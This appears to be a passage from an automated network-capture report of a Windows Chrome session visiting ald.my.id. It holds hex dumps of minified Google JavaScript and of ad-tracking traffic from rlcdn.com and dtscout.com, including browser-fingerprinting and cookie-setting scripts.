                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 6f 6e 28 6d 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 76 28 78 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 46 29 7b 42 5b 78 5d 3d 46 3b 41 2d 2d 3b 41 3d 3d 30 26 26 6d 28 42 29 7d 7d 76 61 72 20 42 3d 5b 5d 2c 41 3d 30 3b 64 6f 20 42 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 41 2b 2b 2c 63 28 6b 2e 76 61 6c 75 65 29 2e 6d 62 28 76 28 42 2e 6c 65 6e 67 74 68 2d 31 29 2c 6e 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6b 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 61 72 20 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6b 60 22 2b 63 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: on(m,n){function v(x){return function(F){B[x]=F;A--;A==0&&m(B)}}var B=[],A=0;do B.push(void 0),A++,c(k.value).mb(v(B.length-1),n),k=h.next();while(!k.done)})};return e});var ra=function(a,b,c){if(a==null)throw new TypeError("k`"+c);if(b instanceof RegExp
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 5f 2e 71 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c 6b 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6b 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6b 7c 7c 6b 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 6d 3d 6b 2e 65 6e 74 72 69 65 73 28 29 2c 6e 3d 6d 2e 6e 65 78 74 28 29 3b 69 66 28 6e 2e 64 6f 6e 65 7c 7c 6e 2e 76 61 6c 75 65 5b 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ction"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(_.q([[h,"s"]]));if(k.get(h)!="s"||k.size!=1||k.get({x:4})||k.set({x:4},"t")!=k||k.size!=2)return!1;var m=k.entries(),n=m.next();if(n.done||n.value[0
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 61 64 3b 29 72 65 74 75 72 6e 20 6d 3d 0a 6d 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6d 29 7d 3b 6d 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 71 61 3d 68 2e 6e 65 78 74 3d 68 2e 68 65 61 64 3d 68 7d 2c 67 3d 30 3b 72 65 74 75 72 6e 20 63 7d 29 3b 0a 70 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ad;)return m=m.next,{done:!1,value:k(m)};m=null}return{done:!0,value:void 0}})},f=function(){var h={};return h.qa=h.next=h.head=h},g=0;return c});p("Set",function(a){if(function(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="f
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 66 2e 76 61 6c 75 65 2c 67 2b 2b 29 29 7d 65 6c 73 65 20 66 6f 72 28 66 3d 62 2e 6c 65 6e 67 74 68 2c 67 3d 30 3b 67 3c 66 3b 67 2b 2b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 62 5b 67 5d 2c 67 29 29 3b 72 65 74 75 72 6e 20 65 7d 7d 29 3b 70 28 22 4f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: turn h};var e=[],f=typeof Symbol!="undefined"&&Symbol.iterator&&b[Symbol.iterator];if(typeof f=="function"){b=f.call(b);for(var g=0;!(f=b.next()).done;)e.push(c.call(d,f.value,g++))}else for(f=b.length,g=0;g<f;g++)e.push(c.call(d,b[g],g));return e}});p("O
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 3a 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 7d 3b 70 28 22 49 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 49 6e 74 31 36 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 31 36 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 49 6e 74 33 32 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 0a 70 28 22 55 69 6e 74 33 32 41 72 72 61 79 2e 70 72 6f 74 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: :Array.prototype.fill};p("Int8Array.prototype.fill",ta);p("Uint8Array.prototype.fill",ta);p("Uint8ClampedArray.prototype.fill",ta);p("Int16Array.prototype.fill",ta);p("Uint16Array.prototype.fill",ta);p("Int32Array.prototype.fill",ta);p("Uint32Array.proto
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 65 74 75 72 6e 20 5f 2e 42 61 28 29 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 3b 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 44 61 3f 21 21 5f 2e 45 61 26 26 5f 2e 45 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 3b 0a 49 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 61 28 29 3f 46 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 74 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 74 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 47 61 28 29 3f 30 3a 5f 2e 74 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 74 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 4b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4a 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: eturn _.Ba().indexOf(a)!=-1};Ga=function(){return _.Da?!!_.Ea&&_.Ea.brands.length>0:!1};Ia=function(){return Ga()?Fa("Chromium"):(_.t("Chrome")||_.t("CriOS"))&&!(Ga()?0:_.t("Edge"))||_.t("Silk")};_.Ka=function(a){return Ja&&a!=null&&a instanceof Uint8Arr
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 3b 0a 74 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 3f 61 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 3b 78 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 76 62 3d 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 62 3d 6e 65 77 20 77 62 28 5b 5d 2c 7b 7d 29 3b 76 62 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 63 61 74 2e 63 61 6c 6c 28 5b 5d 2c 62 29 2e 6c 65 6e 67 74 68 3d 3d 3d 31 7d 76 62 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 53 79 6d 62 6f 6c 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ;tb=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};xb=function(a){if(vb===void 0){var b=new wb([],{});vb=Array.prototype.concat.call([],b).length===1}vb&&typeof Symbol==="function"&&Symbol.isConcatSpreadab


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          58192.168.2.74979335.244.174.684432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC604OUTGET /361726.gif?n=1&33random=1728897157218.1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: rc.rlcdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC664INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          Location: https://rc.rlcdn.com/1000.gif?memo=CP6JFhoNCIXBs7gGEgUI6AcQAEIASgA
                                                                                                                                                                                                                                                                                                                                                                          P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: rlas3=Br7g69ymsr9T4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; Path=/; Domain=rlcdn.com; Expires=Tue, 14 Oct 2025 09:12:37 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: pxrc=CAA=; Path=/; Domain=rlcdn.com; Expires=Fri, 13 Dec 2024 09:12:37 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          59192.168.2.749796141.101.120.104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC488OUTGET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fald.my.id%2F&j=https%3A%2F%2Fald.my.id%2F HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: e.dtscout.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: m=1; st=1; df=1728897155; l=1040172889715587758A2B28B3F6BBD2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1029INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          X-S: mtl2
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: m=2; Domain=dtscout.com; Expires=Mon, 14-Oct-2024 10:35:57 GMT; Max-Age=5000; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: st=2; Domain=dtscout.com; Expires=Mon, 14-Oct-2024 10:12:37 GMT; Max-Age=3600; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: l=1040172889715587758A2B28B3F6BBD2; Domain=dtscout.com; Expires=Fri, 10-Jan-2025 09:12:37 GMT; Max-Age=7603200; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          X-T: 0.27
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8h1GOy3ZfoEduO3JPaLpogvNR7F8UTUYRyMG1T19YFXMhjmv%2FbbKX1NwJlsnQUrKQ%2BqpjAeRnKhCWa7CDF8p%2BZicMu%2FW%2Fwbkm2Mz1BGCZO8tdZpP%2Fq656OwqUEwhGt8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8d2672e4ecb2c345-EWR
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC340INData Raw: 31 66 65 35 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 64 63 20 3d 20 7b 7d 3b 0a 20 20 20 20 76 61 72 20 67 75 20 3d 20 22 31 30 34 30 31 37 32 38 38 39 37 31 35 35 38 37 37 35 38 41 32 42 32 38 42 33 46 36 42 42 44 32 22 3b 0a 20 20 20 20 76 61 72 20 73 75 20 3d 20 22 31 30 34 30 31 37 32 38 38 39 37 31 35 37 31 36 42 32 43 44 43 46 41 45 34 42 36 45 33 35 45 38 22 3b 0a 20 20 20 20 76 61 72 20 67 6d 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 76 61 72 20 63 6e 20 3d 20 22 5f 5f 64 74 73 75 22 3b 0a 20 20 20 20 76 61 72 20 6c 67 20 3d 20 7b 63 76 3a 22 55 53 22 2c 63 73 3a 22 43 22 2c 72 76 3a 22 4e 59 22 2c 72 73 3a 22 43 22 7d 3b 0a 0a 20 20 20 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 64 74 73 5f 68 61 73 68 5f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1fe5(function() { var dc = {}; var gu = "1040172889715587758A2B28B3F6BBD2"; var su = "1040172889715716B2CDCFAE4B6E35E8"; var gm = false; var cn = "__dtsu"; var lg = {cv:"US",cs:"C",rv:"NY",rs:"C"}; String.prototype.dts_hash_
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1369INData Raw: 68 61 72 3d 74 68 69 73 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 3b 68 61 73 68 3d 28 28 68 61 73 68 3c 3c 35 29 2d 68 61 73 68 29 2b 63 68 61 72 3b 68 61 73 68 3d 68 61 73 68 26 68 61 73 68 7d 20 72 65 74 75 72 6e 20 68 61 73 68 3b 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 5f 64 74 73 69 28 29 20 7b 0a 20 20 20 20 20 20 20 20 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 2c 20 61 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 20 5f 64 74 73 2e 68 6f 73 74 20 3d 20 61 2e 68 6f 73 74 6e 61 6d 65 2c 20 22 75 6e 64 65 66 69 6e 65 64 22 20 21 3d 20 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 72 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: har=this.charCodeAt(i);hash=((hash<<5)-hash)+char;hash=hash&hash} return hash;}; function _dtsi() { a = document.createElement("a"), a.href = window.location.href, _dts.host = a.hostname, "undefined" != typeof document.referrer && document.re
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1369INData Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 74 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 69 64 67 2f 3f 73 75 3d 22 2b 73 75 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 2e 77 69 64 74 68 20 3d 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 2e 68 65 69 67 68 74 20 3d 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 3b 0a 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 28 65 29 20 7b 20 7d 0a 0a 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ; i.src = "https://t.dtscout.com/idg/?su="+su; i.width = 0; i.height = 0; i.style.display = 'none'; document.body.appendChild(i); } catch(e) { } setTimeout(function() {
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1369INData Raw: 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 64 74 73 5f 70 69 5f 73 74 72 2b 3d 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 5b 69 5d 2e 64 65 73 63 72 69 70 74 69 6f 6e 7d 64 74 73 5f 70 69 5f 73 74 72 3d 64 74 73 5f 70 69 5f 73 74 72 2e 64 74 73 5f 68 61 73 68 5f 63 6f 64 65 28 29 3b 76 61 72 20 64 74 73 5f 64 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 64 74 73 5f 74 7a 5f 6f 66 66 73 65 74 3d 64 74 73 5f 64 2e 67 65 74 54 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 28 29 3b 76 61 72 20 64 74 73 5f 72 65 73 3d 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 22 78 22 2b 73 63 72 65 65 6e 2e 68 65 69 67 68 74 2b 22 78 22 2b 73 63 72 65 65 6e 2e 63 6f 6c 6f 72 44 65 70 74 68 3b 76 61 72 20 64 74 73 5f 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ugins.length;i++){dts_pi_str+=navigator.plugins[i].description}dts_pi_str=dts_pi_str.dts_hash_code();var dts_d=new Date();var dts_tz_offset=dts_d.getTimezoneOffset();var dts_res=screen.width+"x"+screen.height+"x"+screen.colorDepth;var dts_s=document.creat
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1369INData Raw: 20 73 70 6c 69 74 48 6f 73 74 6e 61 6d 65 2e 73 6c 69 63 65 28 69 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 5f 5f 73 63 69 28 6e 2c 76 2c 64 2c 63 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 69 6e 64 65 78 4f 66 28 6e 2b 27 3d 27 2b 76 29 20 21 3d 3d 20 2d 31 29 20 62 72 65 61 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 5f 5f 73 63 69 28 6e 2c 76 2c 64 2c 63 68 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 61 74 65 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 0a 20 20 20 20 20 20 20 20 64 61 74 65 2e 73 65 74 54 69 6d 65 28 64 61 74 65 2e 67 65 74 54 69 6d 65 28 29 20 2b 20 28 64 20 2a 20 38 36 34 30 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: splitHostname.slice(i).join('.'); __sci(n,v,d,ch); if (document.cookie.indexOf(n+'='+v) !== -1) break; } } function __sci(n,v,d,ch) { var date = new Date(); date.setTime(date.getTime() + (d * 86400
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1369INData Raw: 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 73 2c 77 3d 77 69 6e 64 6f 77 2e 74 6f 70 3b 77 2e 54 79 6e 74 3d 77 2e 54 79 6e 74 7c 7c 5b 5d 3b 77 2e 54 79 6e 74 2e 70 75 73 68 28 22 77 75 21 22 29 3b 73 3d 77 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 73 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 74 79 6e 74 2e 63 6f 6d 2f 61 66 77 75 2e 6a 73 22 3b 28 77 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 3b 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: gName("body")[0].appendChild(s);}catch(e){}})();(function(){try{var s,w=window.top;w.Tynt=w.Tynt||[];w.Tynt.push("wu!");s=w.document.createElement("script");s.src="https://cdn.tynt.com/afwu.js";(w.document.getElementsByTagName("head")[0]).appendChild(s);}
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC988INData Raw: 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 64 74 73 70 76 2e 75 28 29 7d 29 2c 74 2e 63 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 68 28 74 29 2c 21 31 21 3d 3d 65 29 74 72 79 7b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 74 73 70 76 5f 22 2b 65 29 3b 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6e 29 7d 63 61 74 63 68 28 74 29 7b 7d 7d 2c 74 2e 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6d 28 29 2c 65 3d 7b 61 3a 22 75 22 2c 68 3a 61 2c 73 73 3a 74 2e 73 73 2c 70 76 3a 74 2e 70 76 7d 2c 6e 3d 6c 28 29 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 65 2e 6c 73 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 6e 2d 74 2e 73 74 29 2c 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: load",function(){window._dtspv.u()}),t.c=function(t,e){if(h(t),!1!==e)try{var n=document.getElementById("dtspv_"+e);n.parentNode.removeChild(n)}catch(t){}},t.u=function(){var t=m(),e={a:"u",h:a,ss:t.ss,pv:t.pv},n=l();for(var o in e.ls=Math.round(n-t.st),e
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          60192.168.2.74979235.244.174.684432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC604OUTGET /361726.gif?n=1&33random=1728897157218.4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: rc.rlcdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
